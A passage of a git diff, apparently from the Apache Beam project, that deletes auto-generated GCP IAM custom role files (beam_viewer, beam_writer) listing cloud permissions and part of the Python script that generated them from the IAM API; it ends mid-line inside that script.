compute.resourcePolicies.useReadOnly -- compute.routers.get -- compute.routers.getRoutePolicy -- compute.routers.list -- compute.routers.listBgpRoutes -- compute.routers.listEffectiveTags -- compute.routers.listRoutePolicies -- compute.routers.listTagBindings -- compute.routes.get -- compute.routes.list -- compute.routes.listEffectiveTags -- compute.routes.listTagBindings -- compute.securityPolicies.listEffectiveTags -- compute.securityPolicies.listTagBindings -- compute.serviceAttachments.get -- compute.serviceAttachments.getIamPolicy -- compute.serviceAttachments.list -- compute.serviceAttachments.listEffectiveTags -- compute.serviceAttachments.listTagBindings -- compute.snapshotSettings.get -- compute.snapshots.get -- compute.snapshots.getIamPolicy -- compute.snapshots.list -- compute.snapshots.listEffectiveTags -- compute.snapshots.listTagBindings -- compute.snapshots.useReadOnly -- compute.spotAssistants.get -- compute.sslCertificates.get -- compute.sslCertificates.list -- compute.sslCertificates.listEffectiveTags -- compute.sslCertificates.listTagBindings -- compute.sslPolicies.listEffectiveTags -- compute.sslPolicies.listTagBindings -- compute.storagePools.get -- compute.storagePools.getIamPolicy -- compute.storagePools.list -- compute.subnetworks.get -- compute.subnetworks.getIamPolicy -- compute.subnetworks.list -- compute.subnetworks.listEffectiveTags -- compute.subnetworks.listTagBindings -- compute.targetGrpcProxies.get -- compute.targetGrpcProxies.list -- compute.targetGrpcProxies.listEffectiveTags -- compute.targetGrpcProxies.listTagBindings -- compute.targetHttpProxies.get -- compute.targetHttpProxies.list -- compute.targetHttpProxies.listEffectiveTags -- compute.targetHttpProxies.listTagBindings -- compute.targetHttpsProxies.get -- compute.targetHttpsProxies.list -- compute.targetHttpsProxies.listEffectiveTags -- compute.targetHttpsProxies.listTagBindings -- compute.targetInstances.get -- compute.targetInstances.list -- compute.targetInstances.listEffectiveTags -- compute.targetInstances.listTagBindings -- compute.targetPools.get -- compute.targetPools.list -- compute.targetPools.listEffectiveTags -- compute.targetPools.listTagBindings -- compute.targetSslProxies.get -- compute.targetSslProxies.list -- compute.targetSslProxies.listEffectiveTags -- compute.targetSslProxies.listTagBindings -- compute.targetTcpProxies.get -- compute.targetTcpProxies.list -- compute.targetTcpProxies.listEffectiveTags -- compute.targetTcpProxies.listTagBindings -- compute.targetVpnGateways.get -- compute.targetVpnGateways.list -- compute.targetVpnGateways.listEffectiveTags -- compute.targetVpnGateways.listTagBindings -- compute.urlMaps.listEffectiveTags -- compute.urlMaps.listTagBindings -- compute.vpnGateways.get -- compute.vpnGateways.list -- compute.vpnGateways.listEffectiveTags -- compute.vpnGateways.listTagBindings -- compute.vpnTunnels.get -- compute.vpnTunnels.list -- compute.vpnTunnels.listEffectiveTags -- compute.vpnTunnels.listTagBindings -- compute.wireGroups.get -- compute.wireGroups.list -- compute.zoneOperations.get -- compute.zoneOperations.list -- compute.zones.get -- compute.zones.list -- container.apiServices.get -- container.apiServices.getStatus -- container.apiServices.list -- container.auditSinks.get -- container.auditSinks.list -- container.backendConfigs.get -- container.backendConfigs.list -- container.certificateSigningRequests.get -- container.certificateSigningRequests.getStatus -- container.certificateSigningRequests.list -- container.clusterRoleBindings.get -- container.clusterRoleBindings.list -- container.clusterRoles.get -- container.clusterRoles.list -- container.clusters.connect -- container.clusters.get -- container.clusters.list -- container.clusters.listEffectiveTags -- container.clusters.listTagBindings -- container.componentStatuses.get -- container.componentStatuses.list -- container.configMaps.get -- container.configMaps.list -- container.controllerRevisions.get -- container.controllerRevisions.list -- container.cronJobs.get -- container.cronJobs.getStatus -- container.cronJobs.list -- container.csiDrivers.get -- container.csiDrivers.list -- container.csiNodeInfos.get -- container.csiNodeInfos.list -- container.csiNodes.get -- container.csiNodes.list -- container.customResourceDefinitions.get -- container.customResourceDefinitions.getStatus -- container.customResourceDefinitions.list -- container.daemonSets.get -- container.daemonSets.getStatus -- container.daemonSets.list -- container.deployments.get -- container.deployments.getStatus -- container.deployments.list -- container.endpointSlices.get -- container.endpointSlices.list -- container.endpoints.get -- container.endpoints.list -- container.events.get -- container.events.list -- container.frontendConfigs.get -- container.frontendConfigs.list -- container.horizontalPodAutoscalers.get -- container.horizontalPodAutoscalers.getStatus -- container.horizontalPodAutoscalers.list -- container.ingresses.get -- container.ingresses.getStatus -- container.ingresses.list -- container.jobs.get -- container.jobs.getStatus -- container.jobs.list -- container.leases.get -- container.leases.list -- container.limitRanges.get -- container.limitRanges.list -- container.managedCertificates.get -- container.managedCertificates.list -- container.mutatingWebhookConfigurations.get -- container.mutatingWebhookConfigurations.list -- container.namespaces.get -- container.namespaces.getStatus -- container.namespaces.list -- container.networkPolicies.get -- container.networkPolicies.list -- container.nodes.get -- container.nodes.getStatus -- container.nodes.list -- container.operations.get -- container.operations.list -- container.persistentVolumeClaims.get -- container.persistentVolumeClaims.getStatus -- container.persistentVolumeClaims.list -- container.persistentVolumes.get -- container.persistentVolumes.getStatus -- container.persistentVolumes.list -- container.podDisruptionBudgets.get -- container.podDisruptionBudgets.getStatus -- container.podDisruptionBudgets.list -- container.podSecurityPolicies.get -- container.podSecurityPolicies.list -- container.podTemplates.get -- container.podTemplates.list -- container.pods.get -- container.pods.getLogs -- container.pods.getStatus -- container.pods.list -- container.priorityClasses.get -- container.priorityClasses.list -- container.replicaSets.get -- container.replicaSets.getScale -- container.replicaSets.getStatus -- container.replicaSets.list -- container.replicationControllers.get -- container.replicationControllers.getScale -- container.replicationControllers.getStatus -- container.replicationControllers.list -- container.resourceQuotas.get -- container.resourceQuotas.getStatus -- container.resourceQuotas.list -- container.roleBindings.get -- container.roleBindings.list -- container.roles.get -- container.roles.list -- container.runtimeClasses.get -- container.runtimeClasses.list -- container.selfSubjectAccessReviews.create -- container.selfSubjectRulesReviews.create -- container.serviceAccounts.get -- container.serviceAccounts.list -- container.services.get -- container.services.getStatus -- container.services.list -- container.statefulSets.get -- container.statefulSets.getScale -- container.statefulSets.getStatus -- container.statefulSets.list -- container.storageClasses.get -- container.storageClasses.list -- container.storageStates.get -- container.storageStates.getStatus -- container.storageStates.list -- container.storageVersionMigrations.get -- container.storageVersionMigrations.getStatus -- container.storageVersionMigrations.list -- container.thirdPartyObjects.get -- container.thirdPartyObjects.list -- container.tokenReviews.create -- container.updateInfos.get -- container.updateInfos.list -- container.validatingWebhookConfigurations.get -- container.validatingWebhookConfigurations.list -- container.volumeAttachments.get -- container.volumeAttachments.getStatus -- container.volumeAttachments.list -- container.volumeSnapshotClasses.get -- container.volumeSnapshotClasses.list -- container.volumeSnapshotContents.get -- container.volumeSnapshotContents.getStatus -- container.volumeSnapshotContents.list -- container.volumeSnapshots.get -- container.volumeSnapshots.getStatus -- container.volumeSnapshots.list -- containeranalysis.notes.get -- containeranalysis.notes.getIamPolicy -- containeranalysis.notes.list -- containeranalysis.occurrences.get -- containeranalysis.occurrences.getIamPolicy -- containeranalysis.occurrences.list -- containersecurity.locations.get -- containersecurity.locations.list -- dataflow.jobs.get -- dataflow.jobs.list -- dataflow.messages.list -- dataflow.metrics.get -- dataflow.snapshots.get -- dataflow.snapshots.list -- dataproc.agents.get -- dataproc.agents.list -- dataproc.autoscalingPolicies.get -- dataproc.autoscalingPolicies.getIamPolicy -- dataproc.autoscalingPolicies.list -- dataproc.autoscalingPolicies.use -- dataproc.batches.get -- dataproc.batches.list -- dataproc.batches.sparkApplicationRead -- dataproc.clusters.get -- dataproc.clusters.getIamPolicy -- dataproc.clusters.list -- dataproc.jobs.get -- dataproc.jobs.getIamPolicy -- dataproc.jobs.list -- dataproc.nodeGroups.get -- dataproc.operations.get -- dataproc.operations.getIamPolicy -- dataproc.operations.list -- dataproc.sessionTemplates.get -- dataproc.sessionTemplates.list -- dataproc.sessions.get -- dataproc.sessions.list -- dataproc.sessions.sparkApplicationRead -- dataproc.tasks.listInvalidatedLeases -- dataproc.workflowTemplates.get -- dataproc.workflowTemplates.getIamPolicy -- dataproc.workflowTemplates.list -- dataprocessing.datasources.get -- dataprocessing.datasources.list -- dataprocessing.featurecontrols.list -- dataprocessing.groupcontrols.get -- dataprocessing.groupcontrols.list -- dataprocrm.locations.get -- dataprocrm.locations.list -- dataprocrm.nodePools.get -- dataprocrm.nodePools.list -- dataprocrm.nodes.get -- dataprocrm.nodes.list -- dataprocrm.nodes.mintOAuthToken -- dataprocrm.operations.get -- dataprocrm.operations.list -- dataprocrm.workloads.get -- dataprocrm.workloads.list -- datastore.backupSchedules.get -- datastore.backupSchedules.list -- datastore.backups.get -- datastore.backups.list -- datastore.databases.get -- datastore.databases.getMetadata -- datastore.databases.list -- datastore.databases.listEffectiveTags -- datastore.databases.listTagBindings -- datastore.entities.get -- datastore.entities.list -- datastore.indexes.get -- datastore.indexes.list -- datastore.insights.get -- datastore.keyVisualizerScans.get -- datastore.keyVisualizerScans.list -- datastore.namespaces.get -- datastore.namespaces.list -- datastore.operations.get -- datastore.operations.list -- datastore.statistics.get -- datastore.statistics.list -- datastore.userCreds.get -- datastore.userCreds.list -- dns.changes.get -- dns.changes.list -- dns.dnsKeys.get -- dns.dnsKeys.list -- dns.managedZoneOperations.get -- dns.managedZoneOperations.list -- dns.managedZones.get -- dns.managedZones.getIamPolicy -- dns.managedZones.list -- dns.policies.get -- dns.policies.list -- dns.projects.get -- dns.resourceRecordSets.get -- dns.resourceRecordSets.list -- dns.responsePolicies.get -- dns.responsePolicies.list -- dns.responsePolicyRules.get -- dns.responsePolicyRules.list -- firebase.billingPlans.get -- firebase.clients.get -- firebase.clients.list -- firebase.links.list -- firebase.playLinks.get -- firebase.playLinks.list -- firebase.projects.get -- firebaseabt.experimentresults.get -- firebaseabt.experiments.get -- firebaseabt.experiments.list -- firebaseabt.projectmetadata.get -- firebaseanalytics.resources.googleAnalyticsReadAndAnalyze -- firebaseappcheck.appAttestConfig.get -- firebaseappcheck.automations.get -- firebaseappcheck.automations.list -- firebaseappcheck.debugTokens.get -- firebaseappcheck.deviceCheckConfig.get -- firebaseappcheck.playIntegrityConfig.get -- firebaseappcheck.recaptchaEnterpriseConfig.get -- firebaseappcheck.recaptchaV3Config.get -- firebaseappcheck.resourcePolicies.get -- firebaseappcheck.safetyNetConfig.get -- firebaseappcheck.services.get -- firebaseappdistro.groups.list -- firebaseappdistro.releases.list -- firebaseappdistro.testers.list -- firebaseauth.configs.get -- firebaseauth.users.get -- firebasecrash.reports.get -- firebasecrashlytics.config.get -- firebasecrashlytics.data.get -- firebasecrashlytics.issues.get -- firebasecrashlytics.issues.list -- firebasecrashlytics.sessions.get -- firebasedatabase.instances.get -- firebasedatabase.instances.list -- firebasedataconnect.connectorRevisions.get -- firebasedataconnect.connectorRevisions.list -- firebasedataconnect.connectors.get -- firebasedataconnect.connectors.list -- firebasedataconnect.locations.get -- firebasedataconnect.locations.list -- firebasedataconnect.operations.get -- firebasedataconnect.operations.list -- firebasedataconnect.schemaRevisions.get -- firebasedataconnect.schemaRevisions.list -- firebasedataconnect.schemas.get -- firebasedataconnect.schemas.list -- firebasedataconnect.services.get -- firebasedataconnect.services.list -- firebasedynamiclinks.destinations.list -- firebasedynamiclinks.domains.get -- firebasedynamiclinks.domains.list -- firebasedynamiclinks.links.get -- firebasedynamiclinks.links.list -- firebasedynamiclinks.stats.get -- firebaseextensions.configs.list -- firebaseextensionspublisher.extensions.get -- firebaseextensionspublisher.extensions.list -- firebasehosting.sites.get -- firebasehosting.sites.list -- firebaseinappmessaging.campaigns.get -- firebaseinappmessaging.campaigns.list -- firebasemessagingcampaigns.campaigns.get -- firebasemessagingcampaigns.campaigns.list -- firebaseml.models.get -- firebaseml.models.list -- firebaseml.modelversions.get -- firebaseml.modelversions.list -- firebasenotifications.messages.get -- firebasenotifications.messages.list -- firebaseperformance.data.get -- firebaserules.releases.get -- firebaserules.releases.getExecutable -- firebaserules.releases.list -- firebaserules.rulesets.list -- firebaserules.rulesets.test -- firebasestorage.buckets.get -- firebasestorage.buckets.list -- firebasestorage.defaultBucket.get -- firebasevertexai.configs.get -- iam.denypolicies.get -- iam.denypolicies.list -- iam.googleapis.com/oauthClientCredentials.get -- iam.googleapis.com/oauthClientCredentials.list -- iam.googleapis.com/oauthClients.get -- iam.googleapis.com/oauthClients.list -- iam.googleapis.com/workloadIdentityPoolProviderKeys.get -- iam.googleapis.com/workloadIdentityPoolProviderKeys.list -- iam.googleapis.com/workloadIdentityPoolProviders.get -- iam.googleapis.com/workloadIdentityPoolProviders.list -- iam.googleapis.com/workloadIdentityPools.get -- iam.googleapis.com/workloadIdentityPools.list -- iam.roles.get -- iam.roles.list -- iam.serviceAccountKeys.get -- iam.serviceAccountKeys.list -- iam.serviceAccounts.get -- iam.serviceAccounts.getIamPolicy -- iam.serviceAccounts.list -- iam.serviceAccounts.listEffectiveTags -- iam.serviceAccounts.listTagBindings -- iap.tunnelDestGroups.get -- iap.tunnelDestGroups.list -- monitoring.alertPolicies.get -- monitoring.alertPolicies.list -- monitoring.alertPolicies.listEffectiveTags -- monitoring.alertPolicies.listTagBindings -- monitoring.dashboards.get -- monitoring.dashboards.list -- monitoring.dashboards.listEffectiveTags -- monitoring.dashboards.listTagBindings -- monitoring.groups.get -- monitoring.groups.list -- monitoring.metricDescriptors.get -- monitoring.metricDescriptors.list -- monitoring.monitoredResourceDescriptors.get -- monitoring.monitoredResourceDescriptors.list -- monitoring.services.get -- monitoring.services.list -- monitoring.slos.get -- monitoring.slos.list -- monitoring.snoozes.get -- monitoring.snoozes.list -- monitoring.timeSeries.list -- monitoring.uptimeCheckConfigs.get -- monitoring.uptimeCheckConfigs.list -- pubsub.messageTransforms.validate -- pubsub.schemas.attach -- pubsub.schemas.get -- pubsub.schemas.getIamPolicy -- pubsub.schemas.list -- pubsub.schemas.listRevisions -- pubsub.schemas.validate -- pubsub.snapshots.list -- pubsub.subscriptions.get -- pubsub.subscriptions.list -- pubsub.topics.get -- pubsub.topics.list -- pubsublite.locations.openKafkaStream -- pubsublite.operations.get -- pubsublite.operations.list -- pubsublite.reservations.get -- pubsublite.reservations.list -- pubsublite.reservations.listTopics -- pubsublite.subscriptions.get -- pubsublite.subscriptions.getCursor -- pubsublite.subscriptions.list -- pubsublite.subscriptions.subscribe -- pubsublite.topics.computeHeadCursor -- pubsublite.topics.computeMessageStats -- pubsublite.topics.computeTimeCursor -- pubsublite.topics.get -- pubsublite.topics.getPartitions -- pubsublite.topics.list -- pubsublite.topics.listSubscriptions -- pubsublite.topics.subscribe -- redis.backupCollections.get -- redis.backupCollections.list -- redis.backups.export -- redis.backups.get -- redis.backups.list -- redis.clusters.get -- redis.clusters.list -- redis.instances.get -- redis.instances.list -- redis.instances.listEffectiveTags -- redis.instances.listTagBindings -- redis.locations.get -- redis.locations.list -- redis.operations.get -- redis.operations.list -- resourcemanager.hierarchyNodes.listEffectiveTags -- resourcemanager.hierarchyNodes.listTagBindings -- resourcemanager.projects.get -- resourcemanager.projects.getIamPolicy -- resourcemanager.tagHolds.list -- resourcemanager.tagKeys.get -- resourcemanager.tagKeys.getIamPolicy -- resourcemanager.tagKeys.list -- resourcemanager.tagValues.get -- resourcemanager.tagValues.getIamPolicy -- resourcemanager.tagValues.list -- secretmanager.locations.get -- secretmanager.locations.list -- secretmanager.secrets.get -- secretmanager.secrets.getIamPolicy -- secretmanager.secrets.list -- secretmanager.secrets.listEffectiveTags -- secretmanager.secrets.listTagBindings -- secretmanager.versions.get -- secretmanager.versions.list -- servicemanagement.services.get -- servicemanagement.services.list -- serviceusage.services.get -- serviceusage.services.list -- spanner.backupOperations.get -- spanner.backupOperations.list -- spanner.backupSchedules.get -- spanner.backupSchedules.getIamPolicy -- spanner.backupSchedules.list -- spanner.backups.get -- spanner.backups.getIamPolicy -- spanner.backups.list -- spanner.databaseOperations.get -- spanner.databaseOperations.list -- spanner.databaseRoles.list -- spanner.databases.beginReadOnlyTransaction -- spanner.databases.get -- spanner.databases.getDdl -- spanner.databases.getIamPolicy -- spanner.databases.list -- spanner.databases.partitionQuery -- spanner.databases.partitionRead -- spanner.databases.read -- spanner.databases.select -- spanner.databases.useDataBoost -- spanner.instanceConfigOperations.get -- spanner.instanceConfigOperations.list -- spanner.instanceConfigs.get -- spanner.instanceConfigs.list -- spanner.instanceOperations.get -- spanner.instanceOperations.list -- spanner.instancePartitionOperations.get -- spanner.instancePartitionOperations.list -- spanner.instancePartitions.get -- spanner.instancePartitions.list -- spanner.instances.get -- spanner.instances.getIamPolicy -- spanner.instances.list -- spanner.instances.listEffectiveTags -- spanner.instances.listTagBindings -- spanner.sessions.create -- spanner.sessions.get -- spanner.sessions.list -- storage.buckets.list -- storage.buckets.listEffectiveTags -- storage.buckets.listTagBindings -- storage.folders.get -- storage.folders.list -- storage.hmacKeys.get -- storage.hmacKeys.list -- storage.intelligenceConfigs.get -- storageinsights.datasetConfigs.get -- storageinsights.datasetConfigs.list -- storageinsights.locations.get -- storageinsights.locations.list -- storageinsights.operations.get -- storageinsights.operations.list -- storageinsights.reportConfigs.get -- storageinsights.reportConfigs.list -- storageinsights.reportDetails.get -- storageinsights.reportDetails.list -- storagetransfer.agentpools.get -- storagetransfer.agentpools.list -- storagetransfer.jobs.get -- storagetransfer.jobs.list -- storagetransfer.operations.get -- storagetransfer.operations.list -- storagetransfer.projects.getServiceAccount -- trafficdirector.networks.getConfigs -role_id: beam_viewer -stage: GA -title: beam_viewer diff --git a/infra/iam/roles/beam_writer.role.yaml b/infra/iam/roles/beam_writer.role.yaml deleted file mode 100644 index 947757b0d6d9..000000000000 --- a/infra/iam/roles/beam_writer.role.yaml +++ /dev/null @@ -1,306 +0,0 @@ -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# This file is auto-generated by generate_roles.py. -# Do not edit manually. - -# This file was generated on 2025-08-11 15:53:17 UTC - -description: This is the beam_writer role -permissions: -- bigquery.datasets.create -- bigquery.tables.export -- bigquery.tables.get -- bigquery.tables.getData -- bigquery.tables.list -- bigquerymigration.translation.translate -- cloudkms.cryptoKeyVersions.get -- cloudkms.cryptoKeyVersions.list -- cloudkms.cryptoKeys.get -- cloudkms.cryptoKeys.getIamPolicy -- cloudkms.cryptoKeys.list -- cloudkms.ekmConfigs.get -- cloudkms.ekmConfigs.getIamPolicy -- cloudkms.ekmConnections.get -- cloudkms.ekmConnections.getIamPolicy -- cloudkms.ekmConnections.list -- cloudkms.ekmConnections.verifyConnectivity -- cloudkms.importJobs.get -- cloudkms.importJobs.getIamPolicy -- cloudkms.importJobs.list -- cloudkms.kajPolicyConfigs.get -- cloudkms.keyHandles.create -- cloudkms.keyHandles.get -- cloudkms.keyHandles.list -- cloudkms.keyRings.get -- cloudkms.keyRings.getIamPolicy -- cloudkms.keyRings.list -- cloudkms.keyRings.listEffectiveTags -- cloudkms.keyRings.listTagBindings -- cloudkms.locations.generateRandomBytes -- cloudkms.locations.get -- cloudkms.locations.list -- cloudkms.operations.get -- cloudkms.projects.showEffectiveAutokeyConfig -- cloudkms.projects.showEffectiveKajEnrollmentConfig -- cloudkms.projects.showEffectiveKajPolicyConfig -- cloudsql.instances.login -- container.apiServices.create -- container.apiServices.update -- container.apiServices.updateStatus -- container.auditSinks.create -- container.auditSinks.update -- container.backendConfigs.create -- container.backendConfigs.update -- container.bindings.create -- container.certificateSigningRequests.create -- container.certificateSigningRequests.update -- container.certificateSigningRequests.updateStatus -- container.configMaps.create -- container.configMaps.update -- container.cronJobs.create -- container.cronJobs.update -- container.cronJobs.updateStatus -- container.csiDrivers.create -- container.csiDrivers.update -- container.csiNodeInfos.create -- container.csiNodeInfos.update -- container.csiNodes.create -- container.csiNodes.update -- container.customResourceDefinitions.create -- container.customResourceDefinitions.update -- container.customResourceDefinitions.updateStatus -- container.daemonSets.create -- container.daemonSets.update -- container.daemonSets.updateStatus -- container.deployments.create -- container.deployments.getScale -- container.deployments.rollback -- container.deployments.update -- container.deployments.updateScale -- container.deployments.updateStatus -- container.endpointSlices.create -- container.endpointSlices.update -- container.endpoints.create -- container.endpoints.update -- container.events.create -- container.events.update -- container.frontendConfigs.create -- container.frontendConfigs.update -- container.horizontalPodAutoscalers.create -- container.horizontalPodAutoscalers.update -- container.horizontalPodAutoscalers.updateStatus -- container.ingresses.create -- container.ingresses.update -- container.ingresses.updateStatus -- container.jobs.create -- container.jobs.update -- container.jobs.updateStatus -- container.leases.create -- container.leases.update -- container.limitRanges.create -- container.limitRanges.update -- container.localSubjectAccessReviews.create -- container.managedCertificates.create -- container.managedCertificates.update -- container.namespaces.create -- container.namespaces.update -- container.namespaces.updateStatus -- container.networkPolicies.create -- container.networkPolicies.update -- container.nodes.create -- container.nodes.proxy -- container.nodes.update -- container.nodes.updateStatus -- container.persistentVolumeClaims.create -- container.persistentVolumeClaims.update -- container.persistentVolumeClaims.updateStatus -- container.persistentVolumes.create -- container.persistentVolumes.update -- container.persistentVolumes.updateStatus -- container.podDisruptionBudgets.create -- container.podDisruptionBudgets.update -- container.podDisruptionBudgets.updateStatus -- container.podTemplates.create -- container.podTemplates.update -- container.pods.attach -- container.pods.create -- container.pods.evict -- container.pods.exec -- container.pods.portForward -- container.pods.proxy -- container.pods.update -- container.pods.updateStatus -- container.priorityClasses.create -- container.priorityClasses.update -- container.replicaSets.create -- container.replicaSets.update -- container.replicaSets.updateScale -- container.replicaSets.updateStatus -- container.replicationControllers.create -- container.replicationControllers.update -- container.replicationControllers.updateScale -- container.replicationControllers.updateStatus -- container.resourceQuotas.create -- container.resourceQuotas.update -- container.resourceQuotas.updateStatus -- container.runtimeClasses.create -- container.runtimeClasses.update -- container.secrets.create -- container.secrets.get -- container.secrets.list -- container.secrets.update -- container.serviceAccounts.create -- container.serviceAccounts.createToken -- container.serviceAccounts.update -- container.services.create -- container.services.proxy -- container.services.update -- container.services.updateStatus -- container.statefulSets.create -- container.statefulSets.update -- container.statefulSets.updateScale -- container.statefulSets.updateStatus -- container.storageClasses.create -- container.storageClasses.update -- container.storageStates.create -- container.storageStates.update -- container.storageStates.updateStatus -- container.storageVersionMigrations.create -- container.storageVersionMigrations.update -- container.storageVersionMigrations.updateStatus -- container.subjectAccessReviews.create -- container.thirdPartyObjects.create -- container.thirdPartyObjects.update -- container.updateInfos.create -- container.updateInfos.update -- container.volumeAttachments.create -- container.volumeAttachments.update -- container.volumeAttachments.updateStatus -- container.volumeSnapshotClasses.create -- container.volumeSnapshotClasses.update -- container.volumeSnapshotContents.create -- container.volumeSnapshotContents.update -- container.volumeSnapshotContents.updateStatus -- container.volumeSnapshots.create -- container.volumeSnapshots.update -- container.volumeSnapshots.updateStatus -- dataform.commentThreads.get -- dataform.commentThreads.list -- dataform.comments.get -- dataform.comments.list -- dataform.compilationResults.get -- dataform.compilationResults.list -- dataform.compilationResults.query -- dataform.config.get -- dataform.locations.get -- dataform.locations.list -- dataform.releaseConfigs.get -- dataform.releaseConfigs.list -- dataform.repositories.computeAccessTokenStatus -- dataform.repositories.create -- dataform.repositories.fetchHistory -- dataform.repositories.fetchRemoteBranches -- dataform.repositories.get -- dataform.repositories.getIamPolicy -- dataform.repositories.list -- dataform.repositories.queryDirectoryContents -- dataform.repositories.readFile -- dataform.workflowConfigs.get -- dataform.workflowConfigs.list -- dataform.workflowInvocations.get -- dataform.workflowInvocations.list -- dataform.workflowInvocations.query -- dataform.workspaces.fetchFileDiff -- dataform.workspaces.fetchFileGitStatuses -- dataform.workspaces.fetchGitAheadBehind -- dataform.workspaces.get -- dataform.workspaces.getIamPolicy -- dataform.workspaces.list -- dataform.workspaces.queryDirectoryContents -- dataform.workspaces.readFile -- dataform.workspaces.searchFiles -- dataplex.aspectTypes.get -- dataplex.aspectTypes.getIamPolicy -- dataplex.aspectTypes.list -- dataplex.assetActions.list -- dataplex.assets.get -- dataplex.assets.getIamPolicy -- dataplex.assets.list -- dataplex.content.get -- dataplex.content.getIamPolicy -- dataplex.content.list -- dataplex.dataAttributeBindings.get -- dataplex.dataAttributeBindings.getIamPolicy -- dataplex.dataAttributeBindings.list -- dataplex.dataAttributes.get -- dataplex.dataAttributes.getIamPolicy -- dataplex.dataAttributes.list -- dataplex.dataTaxonomies.get -- dataplex.dataTaxonomies.getIamPolicy -- dataplex.dataTaxonomies.list -- dataplex.datascans.get -- dataplex.datascans.getData -- dataplex.datascans.getIamPolicy -- dataplex.datascans.list -- dataplex.entities.get -- dataplex.entities.list -- dataplex.entries.get -- dataplex.entries.list -- dataplex.entryGroups.export -- dataplex.entryGroups.get -- dataplex.entryGroups.getIamPolicy -- dataplex.entryGroups.list -- dataplex.entryLinks.get -- dataplex.entryTypes.get -- dataplex.entryTypes.getIamPolicy -- dataplex.entryTypes.list -- dataplex.environments.get -- dataplex.environments.getIamPolicy -- dataplex.environments.list -- dataplex.glossaries.get -- dataplex.glossaries.getIamPolicy -- dataplex.glossaries.list -- dataplex.glossaryCategories.get -- dataplex.glossaryCategories.list -- dataplex.glossaryTerms.get -- dataplex.glossaryTerms.list -- dataplex.lakeActions.list -- dataplex.lakes.get -- dataplex.lakes.getIamPolicy -- dataplex.lakes.list -- dataplex.locations.get -- dataplex.locations.list -- dataplex.metadataJobs.get -- dataplex.metadataJobs.list -- dataplex.operations.get -- dataplex.operations.list -- dataplex.partitions.get -- dataplex.partitions.list -- dataplex.projects.search -- dataplex.tasks.get -- dataplex.tasks.getIamPolicy -- dataplex.tasks.list -- dataplex.zoneActions.list -- dataplex.zones.get -- dataplex.zones.getIamPolicy -- dataplex.zones.list -- datastore.entities.allocateIds -- datastore.entities.create -- datastore.entities.update -- trafficdirector.networks.reportMetrics -role_id: beam_writer -stage: GA -title: beam_writer diff --git a/infra/iam/roles/generate_roles.py b/infra/iam/roles/generate_roles.py deleted file mode 100644 index 2d2b4d294ef6..000000000000 --- a/infra/iam/roles/generate_roles.py +++ /dev/null @@ -1,277 +0,0 @@ -# -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# This script generates roles based on what Apache Beam uses in GCP. -# The roles are defined in a YAML file. - -import yaml -import datetime -import os -from google.cloud import iam_admin_v1 -from google.api_core import exceptions - -# Permissions cache to avoid repeated API calls. -permissions_cache = {} - -ASF_LICENSE_HEADER = """# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the \"License\"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an \"AS IS\" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# This file is auto-generated by generate_roles.py. -# Do not edit manually. -\n""" - -def get_permission_stage(permission_name: str, project_id: str) -> str: - """ - Finds the support level of a specific IAM permission for a given project. This function caches the results to avoid repeated API calls. - - Args: - permission_name: The name of the permission to check, e.g., 'storage.buckets.create'. - project_id: The ID of the GCP project to check against. - Returns: - The support level of the permission as a string, or "" if the permission is not found. - """ - global permissions_cache - - try: - if f"{project_id}-stage" in permissions_cache: - return permissions_cache[f"{project_id}-stage"].get(permission_name, "") - else: - permissions_cache[f"{project_id}-stage"] = {} - - client = iam_admin_v1.IAMClient() - resource = f"//cloudresourcemanager.googleapis.com/projects/{project_id}" - - request = iam_admin_v1.QueryTestablePermissionsRequest( - full_resource_name=resource, - page_size=1000 - ) - - for permission in client.query_testable_permissions(request=request): - permissions_cache[f"{project_id}-stage"][permission.name] = permission.custom_roles_support_level - - return permissions_cache[f"{project_id}-stage"].get(permission_name, "") - - except exceptions.PermissionDenied as e: - print(f"Error: Permission denied. Ensure you have 'resourcemanager.projects.get' on project '{project_id}'.") - print(f"Details: {e}") - return "" - except exceptions.NotFound as e: - print(f"Error: Project '{project_id}' not found.") - print(f"Details: {e}") - return "" - except Exception as e: - print(f"An unexpected error occurred while fetching permissions: {e}") - return "" - -def get_role_permissions(role_name: str, project_id: str = "") -> list[str]: - """ - Gets the permissions included in a predefined or custom IAM role, filtered to only GA permissions. - - Args: - role_name: The full name of the role. - For predefined roles, e.g., 'roles/secretmanager.viewer'. - For custom roles, e.g., 'projects/your-project-id/roles/your-custom-role'. - - project_id: Optional, used for permission metadata lookup. - Returns: - A list of GA permissions associated with the role. - """ - - global permissions_cache - print(f"Fetching permissions for role: {role_name} in project: {project_id}") - - try: - if f"{project_id}-role" in permissions_cache and role_name in permissions_cache[f"{project_id}-role"]: - return permissions_cache[f"{project_id}-role"].get(role_name, []) - else: - if f"{project_id}-role" not in permissions_cache: - permissions_cache[f"{project_id}-role"] = {} - - client = iam_admin_v1.IAMClient() - request = iam_admin_v1.GetRoleRequest( - name=role_name, - ) - role = client.get_role(request=request) - all_perms = list(role.included_permissions) - ga_perms = [] - for perm in all_perms: - stage = get_permission_stage(perm, project_id) - if stage == 